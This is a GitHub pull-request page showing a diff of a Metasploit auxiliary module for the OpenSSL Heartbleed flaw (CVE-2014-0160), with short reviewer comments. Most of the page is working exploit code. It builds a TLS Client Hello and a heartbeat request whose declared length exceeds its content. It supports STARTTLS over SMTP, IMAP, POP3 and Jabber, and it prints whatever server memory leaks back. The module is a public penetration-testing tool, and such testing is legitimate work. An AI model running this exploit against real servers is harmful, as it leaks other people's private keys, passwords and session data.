Complete @Firefart's OpenSSL Heartbleed attack #3206
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -67,7 +67,18 @@ class Metasploit3 < Msf::Auxiliary | |
|
|
||
| HANDSHAKE_RECORD_TYPE = 0x16 | ||
| HEARTBEAT_RECORD_TYPE = 0x18 | ||
| TLS_VERSION = { | ||
| '1.0' => 0x0301, | ||
| '1.1' => 0x0302, | ||
| '1.2' => 0x0303 | ||
| } | ||
|
|
||
| TTLS_CALLBACKS = { | ||
| 'SMTP' => :tls_smtp, | ||
| 'IMAP' => :tls_imap, | ||
| 'JABBER' => :tls_jabber, | ||
| 'POP3' => :tls_pop3 | ||
| } | ||
|
|
||
| def initialize | ||
| super( | ||
|
|
@@ -78,27 +89,34 @@ def initialize | |
| memory data in the response. | ||
| }, | ||
| 'Author' => [ | ||
| 'Neel Mehta', # Vulnerability discovery | ||
| 'Riku', # Vulnerability discovery | ||
| 'Antti', # Vulnerability discovery | ||
| 'Matti', # Vulnerability discovery | ||
| 'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it. | ||
| 'FiloSottile', # PoC site and tool | ||
| 'Christian Mehlmauer <FireFart[at]gmail.com>', # Msf module | ||
| 'juan vazquez', #Msf module | ||
| 'wvu' # Msf module | ||
| ], | ||
| 'References' => | ||
| [ | ||
| ['CVE', '2014-0160'], | ||
| ['US-CERT-VU', '720951'], | ||
| ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'], | ||
| ['URL', 'http://heartbleed.com/'], | ||
| ['URL', 'https://github.com/FiloSottile/Heartbleed'], | ||
| ['URL', 'https://gist.github.com/takeshixx/10107280'], | ||
| ['URL', 'http://filippo.io/Heartbleed/'] | ||
| ], | ||
| 'License' => MSF_LICENSE, | ||
| ) | ||
|
|
||
| register_options( | ||
| [ | ||
| Opt::RPORT(443), | ||
|
There was a problem hiding this comment. Would this module work against other SSL services, SMTP etc? The default port can stay the same even so, but maybe a note in description if so? There was a problem hiding this comment. will be merged soon ;) |
||
| OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]), | ||
| OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.1', ['1.0', '1.1', '1.2']]) | ||
| ], self.class) | ||
| end | ||
|
|
||
|
|
@@ -109,9 +127,10 @@ def peer | |
| def tls_smtp | ||
| # https://tools.ietf.org/html/rfc3207 | ||
| sock.get_once | ||
| sock.put("EHLO #{Rex::Text.rand_text_alpha(10)}\n") | ||
| res = sock.get_once | ||
|
|
||
| unless res && res =~ /STARTTLS/ | ||
| return nil | ||
| end | ||
| sock.put("STARTTLS\n") | ||
|
|
@@ -123,7 +142,7 @@ def tls_imap | |
| sock.get_once | ||
| sock.put("a001 CAPABILITY\r\n") | ||
| res = sock.get_once | ||
| unless res && res =~ /STARTTLS/i | ||
| return nil | ||
| end | ||
| sock.put("a002 STARTTLS\r\n") | ||
|
|
@@ -135,12 +154,12 @@ def tls_pop3 | |
| sock.get_once | ||
| sock.put("CAPA\r\n") | ||
| res = sock.get_once | ||
| if res.nil? || res =~ /^-/ | ||
| return nil | ||
| end | ||
| sock.put("STLS\r\n") | ||
| res = sock.get_once | ||
| if res.nil? || res =~ /^-/ | ||
| return nil | ||
| end | ||
| end | ||
|
|
@@ -155,7 +174,7 @@ def tls_jabber | |
| sock.put(msg) | ||
| res = sock.get_once | ||
| return nil if res.nil? # SSL not supported | ||
| return nil if res =~ /stream:error/ || res !~ /starttls/i | ||
| msg = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>" | ||
| sock.put(msg) | ||
| sock.get_once | ||
|
|
@@ -164,56 +183,30 @@ def tls_jabber | |
| def run_host(ip) | ||
| connect | ||
|
|
||
| unless datastore['STARTTLS'] == 'None' | ||
| vprint_status("#{peer} - Trying to start SSL via #{datastore['STARTTLS']}") | ||
| res = self.send(TTLS_CALLBACKS[datastore['STARTTLS']]) | ||
| if res.nil? | ||
|
There was a problem hiding this comment. I think that's probably ok. The Ruby guidelines only say to use |
||
| vprint_error("#{peer} - STARTTLS failed...") | ||
| return | ||
| end | ||
| end | ||
|
|
||
| vprint_status("#{peer} - Sending Client Hello...") | ||
| sock.put(client_hello) | ||
|
|
||
| server_hello = sock.get | ||
| unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE | ||
| vprint_error("#{peer} - Server Hello Not Found") | ||
| return | ||
| end | ||
|
|
||
| vprint_status("#{peer} - Sending Heartbeat...") | ||
| heartbeat_length = 16384 | ||
| sock.put(heartbeat(heartbeat_length)) | ||
| hdr = sock.get_once(5) | ||
| if hdr.blank? | ||
|
There was a problem hiding this comment. can hdr be nil? I assume on timeout? There was a problem hiding this comment. Yeah, nil is a possible return value. There was a problem hiding this comment. I think it even raises EOFError -_- |
||
| vprint_error("#{peer} - No Heartbeat response...") | ||
| return | ||
| end | ||
|
|
||
|
|
@@ -222,64 +215,63 @@ def run_host(ip) | |
| version = unpacked[1] # must match the type from client_hello | ||
| len = unpacked[2] | ||
|
|
||
| unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']] | ||
| vprint_error("#{peer} - Unexpected Heartbeat response'") | ||
| disconnect | ||
| return | ||
| end | ||
|
|
||
| vprint_status("#{peer} - Heartbeat response, checking if there is data leaked...") | ||
| heartbeat_data = sock.get_once(heartbeat_length) # Read the magic length... | ||
| if heartbeat_data && heartbeat_data.length > len | ||
| print_good("#{peer} - Heartbeat response with leak") | ||
| report_vuln({ | ||
| :host => rhost, | ||
| :port => rport, | ||
| :name => self.name, | ||
| :refs => self.references, | ||
| :info => "Module #{self.fullname} successfully leaked info" | ||
| }) | ||
| vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}") | ||
| else | ||
| vprint_error("#{peer} - Looks like there isn't leaked information...") | ||
| end | ||
| end | ||
|
|
||
| def heartbeat(length) | ||
| payload = "\x01" # Heartbeat Message Type: Request (1) | ||
| payload << "\x40\x00" # Payload Length: 16384 | ||
| payload << [length].pack("n") | ||
|
|
||
| ssl_record(HEARTBEAT_RECORD_TYPE, payload) | ||
| end | ||
|
|
||
| def client_hello | ||
| hello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack("n") # Version TLS | ||
| hello_data << "\x53\x43\x5b\x90" # Random generation Time (Apr 8, 2014 04:14:40.000000000) | ||
| hello_data << Rex::Text.rand_text(28) # Random | ||
| hello_data << "\x00" # Session ID length | ||
| hello_data << [CIPHER_SUITES.length * 2].pack("n") # Cipher Suites length (102) | ||
| hello_data << CIPHER_SUITES.pack("n*") # Cipher Suites | ||
| hello_data << "\x01" # Compression methods length (1) | ||
| hello_data << "\x00" # Compression methods: null | ||
|
|
||
| hello_data_extensions = "\x00\x0f" # Extension type (Heartbeat) | ||
| hello_data_extensions << "\x00\x01" # Extension length | ||
| hello_data_extensions << "\x01" # Extension data | ||
|
|
||
| hello_data << [hello_data_extensions.length].pack("n") | ||
| hello_data << hello_data_extensions | ||
|
|
||
| data = "\x01\x00" # Handshake Type: Client Hello (1) | ||
| data << [hello_data.length].pack("n") # Length | ||
| data << hello_data | ||
|
|
||
| ssl_record(HANDSHAKE_RECORD_TYPE, data) | ||
| end | ||
|
|
||
| def ssl_record(type, data) | ||
| record = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn') | ||
| record << data | ||
| end | ||
| end | ||
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Neel Mehta #Google Security
Riku, Antti and Matti #Codenomicon
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks @Meatballs1 , adding!